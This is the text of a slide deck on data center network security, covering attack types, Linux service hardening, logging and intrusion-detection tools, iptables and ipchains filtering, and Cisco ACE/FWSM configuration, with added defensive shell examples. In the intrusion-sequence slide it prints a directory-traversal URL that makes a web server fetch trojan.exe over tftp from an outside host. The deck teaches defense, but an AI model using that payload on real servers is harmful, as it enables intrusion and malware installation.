
Data Center Network Security

History
Old days: security = planting two firewalls
Today: security = a very complex problem

Type of attacks
Attacks on networks have become more sophisticated and are carried out through, but not limited to, one of the following techniques:
* Packet sniffing: An application that uses the promiscuous mode of the network adapter to capture all network packets.
* IP spoofing: An attack in which a hacker assumes the IP address of another host to conceal his true identity.
* Denial-of-service (DoS) attack: Aims to overwhelm a service so as to deny legitimate requests from being serviced. The service may be in the form of bandwidth, memory, or CPU. It is the most well-known of all Internet attacks, and efforts should be invested in understanding its mechanisms. Some of the more famous DoS attacks include the following:
  o Code Red
  o Blaster
  o Ping of Death
  o Trinity

Type of attacks
* Password attack: As its name implies, this attack intends to acquire passwords to important assets so as to cause further damage. Password attacks can be achieved through other methods previously mentioned, such as IP spoofing, or via brute force.
* Man-in-the-middle attack: This type of attack happens when a hacker manages to position himself between the source and the destination of a network transaction. ARP cache poisoning is one common method.
* Application attack: This type of attack happens when application software holes are exploited to gain access to a computer system. The holes may be bugs or may be TCP port numbers that are exposed.
* Port redirection attack: This type of attack makes use of a compromised host to gain access to a network that is otherwise protected.

Typical Intrusion Sequence Hacking the Web/Application Server


After a phase of probing/scanning, the hacker detects a vulnerability in the web/application server. The hacker exploits the vulnerability to get a shell. For example, copying a Trojan onto the web/application server:
HTTPS://www.example.com/scripts/..%c0%af../winnt/system32 /cmd.exe?/c+tftp%20i%2010.20.15.15%20GET%20trojan.exe%20trojan.exe

Automated Intrusion Sequence: Blaster Example

Attack Patterns

Server Farm Security Strategies

Segmenting the Server Farm

Building the Firewall Ruleset

From Physical Separation to Logical Separation

Avoid Break-ins in Linux


To save on system resources and make system administration less complex, many services are handled through a configuration file, /etc/inetd.conf. This file tells the system how to run each of the available services. Many Linux vendors turn on various services in inetd.conf by default when, for maximum security, they should be off! In many corporate environments security as such is not an issue: if there is enough security to prevent accidental damage in these 'soft' environments, providing access to these services is more important than preventing it.

Avoid Break-ins in Linux


If your Linux host is exposed to the Internet you may hold a different point of view, though. To check what services are currently running on your Linux system, type the command

netstat -vat

This will print something like this:

tcp 0 0 *:6000 *:* LISTEN
tcp 0 0 *:www *:* LISTEN
tcp 0 0 *:auth *:* LISTEN
tcp 0 0 *:finger *:* LISTEN
tcp 0 0 *:shell *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN

Each line that says LISTEN is a service waiting for connections.

Avoid Break-ins in Linux


Some of these services run as stand-alone programs, but many of them are controlled by /etc/inetd.conf. If you are not sure what a service does, look it up in /etc/inetd.conf. For instance, if you type

grep '^finger' /etc/inetd.conf


you will get back a line from inetd.conf like this

finger stream tcp nowait nobody /usr/sbin/tcpd /usr/sbin/in.fingerd

Avoid Break-ins in Linux


To see what the program does, look up in.fingerd in its man page (man in.fingerd). If you think you can live without this service, it can be turned off in /etc/inetd.conf. By commenting out the line (put a # at the start of the line) and then issuing the command killall -HUP inetd, you can immediately and permanently turn a service off. There is no need to reboot.

Avoid Break-ins in Linux


If a service is not listed in /etc/inetd.conf then it probably runs as a stand-alone program. You can remove a service provided by a stand-alone background program by uninstalling its package. Only do this if you are sure about what the program does and are certain that it is not necessary.
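The procedure above (find the service's line in inetd.conf, comment it out, make inetd re-read its configuration) as a small script, added here as an example and not taken from the slides; the inetd.conf it edits is a constructed sample in a temporary directory, so it can be run without touching /etc/inetd.conf.

```sh
#!/bin/sh
# Added example, not part of the original slides: the inetd procedure the
# text describes as a script, that is, find the service's line, comment it
# out, and tell inetd to re-read its configuration, plus a listing of what
# is still enabled. The sample inetd.conf is constructed; a real run would
# point at /etc/inetd.conf.

# Print the service names still enabled (uncommented) in inetd.conf $1.
list_enabled_services() {
    grep -v '^[[:space:]]*#' "$1" | awk 'NF >= 6 { print $1 }'
}

# Comment out every active line for service $1 in inetd.conf $2.
# Returns 0 if a line was disabled, 1 if the service is not in the file
# (then it is probably a stand-alone program, removed via its package).
disable_inetd_service() {
    svc="$1"; conf="$2"
    if ! grep -q "^${svc}[[:space:]]" "$conf"; then
        echo "$svc: not found in $conf (stand-alone program?)" >&2
        return 1
    fi
    cp "$conf" "$conf.bak"                      # keep a backup
    sed "s/^\(${svc}[[:space:]]\)/#\1/" "$conf.bak" > "$conf"
    echo "$svc disabled in $conf; run reload_inetd to apply"
}

# Make the running inetd re-read its configuration (the slides'
# 'killall -HUP inetd'). Not called by the demo, so a live system is
# left untouched.
reload_inetd() {
    killall -HUP inetd
}

# Demo on a constructed inetd.conf in a temporary directory.
demo_conf="$(mktemp -d)/inetd.conf"
cat > "$demo_conf" <<'EOF'
# constructed sample inetd.conf
finger  stream  tcp  nowait  nobody  /usr/sbin/tcpd  /usr/sbin/in.fingerd
telnet  stream  tcp  nowait  root    /usr/sbin/tcpd  /usr/sbin/in.telnetd
#shell  stream  tcp  nowait  root    /usr/sbin/tcpd  /usr/sbin/in.rshd
EOF
echo "enabled before: $(list_enabled_services "$demo_conf" | tr '\n' ' ')"
disable_inetd_service finger "$demo_conf"
echo "enabled after:  $(list_enabled_services "$demo_conf" | tr '\n' ' ')"
```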

SSH
To add extra security to the various services, Linux has a system for allowing and denying them to chosen hosts. For instance, you may wish to allow logins from machines at your own site, but not from the Internet. The files /etc/hosts.allow and /etc/hosts.deny list allowed services and hosts.
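Added example, not from the slides, of how tcpd evaluates hosts.allow and hosts.deny for the policy just described (logins from the local site, none from the Internet); it handles only the ALL wildcard, exact IPv4 addresses and dotted prefixes, and the policy files and addresses are constructed.

```sh
#!/bin/sh
# Added example, not part of the original slides: evaluates a (daemon,
# client) pair against /etc/hosts.allow and /etc/hosts.deny the way tcpd
# does. A match in hosts.allow grants; otherwise a match in hosts.deny
# refuses; otherwise access is granted. Only a subset of the client
# syntax is handled: ALL, an exact IPv4 address, or a dotted prefix such
# as 192.168.1. (note the trailing dot). The policy files and addresses
# below are constructed for the demo.

# Does client address $2 match pattern $1?
client_matches() {
    case "$1" in
        ALL) return 0 ;;
        *.)  case "$2" in "$1"*) return 0 ;; esac ;;
        *)   [ "$1" = "$2" ] && return 0 ;;
    esac
    return 1
}

# Does a rule "daemon_list : client_list" in file $1 match daemon $2 and
# client $3? Blank lines and comments are skipped.
file_matches() {
    while IFS=: read -r daemons clients; do
        case "$daemons" in ''|\#*) continue ;; esac
        for d in $daemons; do
            [ "$d" = ALL ] || [ "$d" = "$2" ] || continue
            for c in $clients; do
                client_matches "$c" "$3" && return 0
            done
        done
    done < "$1"
    return 1
}

# Print tcpd's decision (grant/deny) for daemon $1 connecting from $2.
hosts_access() {
    if file_matches "$ALLOW" "$1" "$2"; then echo grant
    elif file_matches "$DENY" "$1" "$2"; then echo deny
    else echo grant
    fi
}

# Constructed policy: only the local site may reach sshd; all else refused.
dir="$(mktemp -d)"; ALLOW="$dir/hosts.allow"; DENY="$dir/hosts.deny"
printf '# constructed hosts.allow\nsshd : 192.168.1.\n' > "$ALLOW"
printf '# constructed hosts.deny\nALL : ALL\n' > "$DENY"
for pair in "sshd 192.168.1.25" "sshd 203.0.113.7" "in.fingerd 192.168.1.25"; do
    echo "$pair -> $(hosts_access $pair)"
done
```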

SSH
The method of denying connections by checking the host provides a good basic method for throwing off attacks. It is not the end of the story. It is possible to fake host names on incoming connections (oh yes it is). While data is in transit between programs over the Internet it is also in danger. Anyone with the knowledge can look at your data. Using a method known as 'spoofing' they can even inject fake data into a legitimate stream. These problems come about because of the way that Internet protocols interact. To overcome these difficulties ssh was devised.

SSH
ssh is a stable, well-developed open-source system that provides encryption and authentication on connections. Encryption uses codes to protect the packets of data while in transit. Authentication is a process for verifying whether a packet of data or a connection is valid. There are ssh clients for most other operating systems too. By using Linux as a server you can provide ssh-level security for all your network use.

Logging
Linux has a comprehensive set of subsystems to let the systems administrator know what is going on with his or her system. All manner of log files are generally kept in the /var/log directory. Most of the standard services log information to /var/log/syslog and /var/log/messages about users connecting to them or attempting to connect. There are also log files for such services as apache (/var/log/httpd/access_log), mail (/var/log/mail) and firewall (/var/log/firewall).

Logging
The main problem with logging events is that one tends to end up with too much data. Careful filtering, and logging only the important information, is essential.

Logging
There are some good tools out there that will make this work easier. Ethereal is a packet sniffer: with it you can capture various types of packets over a given period of time. It also shows all manner of information about the packets. It is useful for watching packets coming into and going out of your machine. Generally it will detect traffic on your network segment.

Logging
Another logging/intrusion detection type tool is called Tripwire. It takes a snapshot of your important system files and records their signature in a database. Various signature levels are available from mild to wild. You can also set the rules in a policy file to tell Tripwire what to check. After the database is initialized and signed, Tripwire can be executed whenever you need to check the integrity of your system. The report will point out when your files are changed and the severity of the security risk. The Tripwire report is pretty easy to read and can be customized according to your file tracking needs.

Logging
A popular program for detecting access attempts (via the network) and port scans is Snort. The program produces files that log these types of activities and even gives some idea of where to find out more information. It has the same problem as other log files: it gets tough for a busy system administrator to review all the log files on a regular basis.

Firewalls
A firewall is a device that protects a private network from the wider Internet.
The simplest form of firewall is a Linux machine with one network connection (an Ethernet card or modem) connected to the Internet and the other connected to the private network. The firewall computer can reach both the protected network and the Internet. The traffic between the protected network and the Internet is controlled, in both directions, by a list of rules. These rules can be customized for your needs.
CoyoteLinux.com has a firewall system that fits on a floppy and doesn't need a hard disk to run. It is designed specifically to address the need for an easy-to-install, no-nonsense Linux firewall.

Firewalls
All data flowing to and from the Internet and the private network is filtered by the firewall. Inside the private network less care needs to be taken with turning off services and the like. It is a way of concentrating effort on making one machine secure and protecting many others in the process. The methods for correctly setting up firewalls are quite complex.
First you have to configure your machine for two Ethernet cards. Then you have to use the ipchains/iptables software to set up the filters that sit between the two Ethernet cards' data links.

Firewalls
The main drawback with making your systems more secure is that they become less accessible. The idea behind ramping up your system's security is to stop use of your computers by crooks, thieves and malcontents, but let the legitimate users use the system.

Tools
Tools for defense can be grouped into four categories:
* log monitoring
* connection monitoring
* host based intrusion detection
* network based intrusion detection

Log Monitoring
These tools will watch over your log files and help you detect security related events (actually, based on the rules, you can have them detect any type of event). Either by default, or through configuration, they can e-mail you the alerts.
* autobuse
* logcheck
* Logwatch
* swatch

Connection Monitoring
When connected to the Internet, unless a firewall is in place, other systems can connect to yours. These tools will help you know who is connecting to your box, even to the point of detecting stealth scans that normal logging will not catch.
* ippl
* jail
* klaxon
* portsentry
* tcplogd

Host based intrusion detection


These days, it's often difficult to know if an intrusion has taken place. Upon successfully gaining root privilege, an intruder will often erase the logs of the break-in. Quite often, they will take the additional step of installing a set of trojan binaries known as a rootkit. These tools help to detect the intrusion, sometimes even after the intruder has gained root access.
* hostsentry
* Tripwire
* ViperDB

Network based intrusion detection


These tools will help detect intrusions (or intrusion attempts) across your entire network, not just on individual hosts. They will look at the traffic and attempt to match known attack patterns and notify you if an attack is seen.
* Network Flight Recorder
* SHADOW
* snort

Linux Firewalls
* Define a Network Security Policy
* Use a Secure Linux Distro for your firewall
* Harden your firewall
  o Install the minimum number of packages
  o Turn all unused services off
  o Disallow user logins
* Define a set of Firewall Rules
* Define egress and ingress filters
* You'd probably need IP Masquerade or NAT
  o Allows internal machines to get out on the net
  o The outside world sees these internal machines as www.foo.com
* Start with existing/proven/simple example firewall configurations
* Test your firewall from the inside and outside
  o Apply all known exploits and vulnerabilities
  o Apply all known hacking tools and attacks
  o Apply all known rootkits

Installing a Firewall does NOT solve the "security" problem

Linux Firewall Rules


Firewall Rules
* SecurityFocus.net: Example Firewall Scripts
* Linux-Sec.net/FW/Scripts: Example Firewall Scripts

General Firewall Rules
* Turn on ingress and egress rules
* Turn on/off various /proc options
* Outgoing Rules
  o Allow all internal PCs to freely access the Internet
* Incoming Rules
  o Allow incoming DNS requests to the DNS server
  o Allow incoming SMTP requests to the mail server
  o Allow incoming HTTP requests to the web server
  o Allow incoming FTP requests to the ftp server
  o Allow incoming ssh requests to the ssh server
  o Allow incoming wireless requests to the wireless gw server
  o Allow incoming ppp requests to the ppp gw server
  o Allow incoming secure pop3/imap requests to the secure pop server
  o Allow incoming authenticated vpn requests to the vpn server
  o Disallow messenger.msn.com
  o Disallow oscar.aol.com
  o Disallow messenger.yahoo.com (IIRC)

Linux Firewall Rules


NAT Rules
* IP Masquerade
  o E-InfoMax.com: IPMasquerade
  o IPMasq.cjb.net: IP_Masquerade-HOWTO
  o LinuxDoc.org: IP_Masquerade-HOWTO
  o CSUChico.edu

3-line IP Masquerade (LinuxDoc.org):

ipchains -P forward DENY
ipchains -A forward -i ppp0 -j MASQ
echo 1 > /proc/sys/net/ipv4/ip_forward

Egress and Ingress Filtering
* Ingress Filtering: incoming network traffic entering your LAN
  o IETF.org: RFC2827.txt
  o Sans.org: Packet_filter - ingress/egress
  o Sans.org: Firewall Issues
* Egress Filtering: outgoing network traffic leaving your LAN
  o Sans.org: Top Ten Blocking Recommendations Using IPChains
  o Sans.org: ipchains Egress Rules
  o Sans.org: Egress Filtering - cisco
  o Sans.org: Egress Filtering (same as above)
  o Incidents.org: Egress - cisco
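The ingress and egress filters, together with the 3-line masquerade recipe, as one iptables script, added here as an example rather than taken from the slides or the linked SANS documents; the interface names ppp0/eth0 and the 192.168.1.0/24 LAN prefix are assumptions, and the rules are only printed unless APPLY=1 is set.

```sh
#!/bin/sh
# Added example, not part of the original slides: the ingress and egress
# filtering the text describes (RFC 2827 style), plus the slides' 3-line
# masquerade recipe, written for iptables rather than ipchains. Interface
# names and the LAN prefix are assumptions; override them via environment.
# Rules are only printed unless APPLY=1 is set (then run as root).

EXT_IF="${EXT_IF:-ppp0}"        # assumed Internet-facing interface
INT_IF="${INT_IF:-eth0}"        # assumed LAN interface
LAN="${LAN:-192.168.1.0/24}"    # assumed internal address block

# Execute or print one iptables command, depending on APPLY.
rule() {
    if [ "${APPLY:-0}" = 1 ]; then iptables "$@"; else echo "iptables $*"; fi
}

# Ingress filter: packets arriving from the Internet must not claim an
# internal or otherwise unroutable source address (anti-spoofing).
ingress_rules() {
    rule -A INPUT   -i "$EXT_IF" -s "$LAN" -j DROP
    rule -A FORWARD -i "$EXT_IF" -s "$LAN" -j DROP
    for net in 127.0.0.0/8 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16; do
        rule -A FORWARD -i "$EXT_IF" -s "$net" -j DROP
    done
}

# Egress filter: packets leaving for the Internet must carry an internal
# source address, so a compromised LAN host cannot spoof other networks.
# Replies to those sessions are let back in statefully.
egress_rules() {
    rule -A FORWARD -i "$INT_IF" ! -s "$LAN" -j DROP
    rule -A FORWARD -i "$INT_IF" -o "$EXT_IF" -s "$LAN" -j ACCEPT
    rule -A FORWARD -i "$EXT_IF" -o "$INT_IF" \
         -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
}

# Default-deny forwarding, masquerade the LAN and enable IP forwarding:
# the iptables counterpart of "ipchains -P forward DENY",
# "ipchains -A forward -i ppp0 -j MASQ" and the ip_forward echo.
masquerade_rules() {
    rule -P FORWARD DROP
    rule -t nat -A POSTROUTING -o "$EXT_IF" -s "$LAN" -j MASQUERADE
    if [ "${APPLY:-0}" = 1 ]; then echo 1 > /proc/sys/net/ipv4/ip_forward
    else echo "echo 1 > /proc/sys/net/ipv4/ip_forward"; fi
}

# Number of iptables commands a rule set emits in print mode.
count_rules() { "$1" | grep -c '^iptables'; }

masquerade_rules; ingress_rules; egress_rules
```

Order matters: the DROP rules in ingress_rules and egress_rules must be appended before the ACCEPT rules, which is why the script emits them in that sequence.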

Linux Firewall Rules


Cisco ACLs
* Firewalls/HowTo/#Cisco: Cisco ACLs

Proxy Server Rules
* HiSecure Proxy(?)
* tcpr: ftp and telnet forwarder
* COAST: udprelay
* Dec.com: XForward
* ReDir: port redirector
* Reverse Pimpage Revision: remotely access machines behind a firewall
* Reverse Utilities: telnet/http/ssh access to machines behind a firewall
* Sock5
  o SourceForge.net: Tsocks
  o SourceForge.net: socksd
  o inet.no: inet.no dante
  o Umich.edu: nylon
* SolSoft NSM: proxy-based firewall
* httpf: filters out java, js, etc
* tproxy: Squid-Cache.org
* TIS Proxy Server

Data Center Firewalls


FWSM
* Protocol support
* Syslog
* Management tools
* DoS protection

ACE
ACE = Application Control Engine
ACE provides application and network operations management with new levels of control over the way they deploy, operate, deliver, secure and manage their applications and business services across the extended enterprise. It helps enable greater control over the application infrastructure, allowing organizations to quickly deploy and migrate applications, delivering the highest levels of service to the end user while simplifying the overall management and operation of a data center.

FWSM
FWSM = Firewall Service Module

MARS
MARS = Monitoring, Analysis and Response System

Data Center Firewalls


ACE
* Integrated SLB and SSL
* High capacity
* Failover group per context
* Failover tracking by HSRP, interface, IP address
* Autostate aware
* Role-based access control
* Configuration rollback marking
* Bridge mode: interface pairs per context
* Advanced HTTP inspection: MIME/regex

ACE/FWSM Security Comparison


* Access Lists
* Inspection Engines
* Timeouts
* Private VLANs
* Role Based Access Control
* Failover
* Resource Allocation
* Configuration Rollback
* VLAN Assignments

Stateful ACLs: Bridge Mode Context


ACE (Note: ACE Logging Phase 2)

access-list BPDU ethertype permit bpdu
access-list blue extended permit ip any any
interface vlan 104
  bridge-group 1
  access-group input BPDU
  access-group input blue
  no shutdown
interface vlan 204
  bridge-group 1
  access-group input BPDU
  access-group input blue
  no shutdown
interface bvi 1
  ip address 12.20.40.6 255.255.255.0
  alias 12.20.40.8 255.255.255.0
  peer ip address 12.20.40.7 255.255.255.0
  no shutdown
ip route 0.0.0.0 0.0.0.0 12.20.40.1

FWSM 3.1

firewall transparent
access-list BPDU ethertype permit bpdu
access-list blue extended permit ip any any
interface Vlan104
  nameif outside
  bridge-group 1
  security-level 0
interface Vlan40
  nameif inside
  bridge-group 1
  security-level 100
interface BVI1
  ip address 12.20.40.4 255.255.255.0 standby 12.20.40.5
access-group BPDU in interface outside
access-group blue in interface outside
access-group BPDU in interface inside
access-group blue in interface inside
route outside 0.0.0.0 0.0.0.0 12.20.40.1 1

Inspection Compared

HTTP Inspection
* RFC 2616 compliance and filtering
  o Protocol conformance: the first line of a request is "Method SP ..." and that of a response is "HTTP-Version SP ...", etc.
  o De-obfuscation: override attempts to avoid regex searches by encoding the URL
  o Methods: OPTIONS, GET, POST, HEAD, PUT, DELETE, TRACE, CONNECT
  o Extensions: INDEX, MOVE, MKDIR, COPY, EDIT, UNEDIT, SAVE, LOCK, NLOCK, REVLABEL, REVLOG, REVNUM, SETATTRIBUTE, GETATTRIBUTE, GETATTRIBUTENAMES, GETPROPERTIES, STARTREV, STOPREV
* Length and encoding checks
  o Length: configurable range for URL and URL header requests and responses
  o Encoding: chunked | compress | deflate | gzip | identity
* Detect HTTP misuse
  o Peer-to-peer (p2p) applications: Kazaa, Gnutella
  o Tunneling applications: HTTPort/HTTHost, FireThru
  o Instant Messaging (IM): Yahoo Messenger
* MIME type validation and filtering (ACE only)
  o Audio: /*, /midi, /basic, /mpeg, /x-adpcm, /x-aiff, /x-ogg, /x-wav (8)
  o Image: /*, /cgf, /gif, /jpeg, /png, /tiff, /x-3ds, /x-bitmap, /x-niff, /x-portable, /x-xpm (11)
  o Text: /*, /css, /html, /plain, /richtext, /sgml, /xmcd, /xml (8)
  o Video: /*, /-flc, /mpeg, /quicktime, /sgi, /x-avi, /x-fli, /x-mng, /x-msvideo (9)
  o Application: /msword, /octet-stream, /pdf, /postscript, /vnd.ms-excel, /vnd.mspowerpoint, /x-gzip, /x-java-archive, /x-java-vm, /zip (10)
* Regex filtering on HTTP messages (ACE only)
  o Detect the protocol running on top of HTTP, e.g. to detect Yahoo Messenger, look for YMSG in the first 4 bytes

HTTP Inspection Example: Allow Only GETs
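A shell sketch of the "allow only GETs" policy together with the request-line conformance and URL length checks listed above, added here as an example and not ACE or FWSM configuration; the method allow-list, the length limit and the sample requests are constructed.

```sh
#!/bin/sh
# Added example, not part of the original slides: a shell sketch of three
# HTTP inspection checks the slides list, applied to a request line:
# protocol conformance ("Method SP Request-URI SP HTTP-Version"), a URL
# length limit, and a method allow-list (the "Allow Only GETs" case), plus
# the YMSG-in-the-first-4-bytes test for Yahoo Messenger over HTTP.
# Limits, allowed methods and the sample requests are constructed.

ALLOWED_METHODS="${ALLOWED_METHODS:-GET}"   # "Allow Only GETs"
MAX_URL_LEN="${MAX_URL_LEN:-64}"            # configurable URL length range

# Print one verdict for request line $1:
#   allow | malformed | bad-version | url-too-long | drop-method
http_verdict() {
    # Split the request line on whitespace; a conforming line has exactly
    # three tokens, so an embedded space in the URI is caught here.
    set -- $1
    [ $# -eq 3 ] || { echo malformed; return 0; }
    method="$1"; uri="$2"; version="$3"
    case "$version" in HTTP/[0-9].[0-9]) ;; *) echo bad-version; return 0 ;; esac
    [ ${#uri} -le "$MAX_URL_LEN" ] || { echo url-too-long; return 0; }
    for m in $ALLOWED_METHODS; do
        [ "$method" = "$m" ] && { echo allow; return 0; }
    done
    echo drop-method
}

# Print yes if payload $1 starts with YMSG (Yahoo Messenger tunnelled
# over the HTTP port), otherwise no.
ymsg_verdict() {
    case "$1" in YMSG*) echo yes ;; *) echo no ;; esac
}

# Constructed requests
for req in "GET /index.html HTTP/1.1" \
           "POST /upload HTTP/1.1" \
           "GET /a b HTTP/1.1" \
           "GET /index.html HTTP/1.1 extra" \
           "GET /index.html SPDY/3"; do
    printf '%-32s -> %s\n' "$req" "$(http_verdict "$req")"
done
```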

Timeouts per Flow


FWSM 3.1

class-map TN3270-class
  match port tcp eq 23
policy-map TN3270-policy
  class TN3270-class
    set connection timeout embryonic 0:00:30 half-closed 0:10:00 tcp 24:00:00
service-policy TN3270-policy interface inside

ACE

parameter-map type connection TN3270
  set timeout inactivity 86400
class-map match-all TN3270-class
  2 match port tcp eq telnet
policy-map multi-match TN370-policy
  class TN3270-class
    connection advanced-options TN3270
interface vlan 307
  service-policy input TN370-policy

Private VLANs with Service Modules

Role-Based Access with ACE

Customizing Roles and Domains with ACE
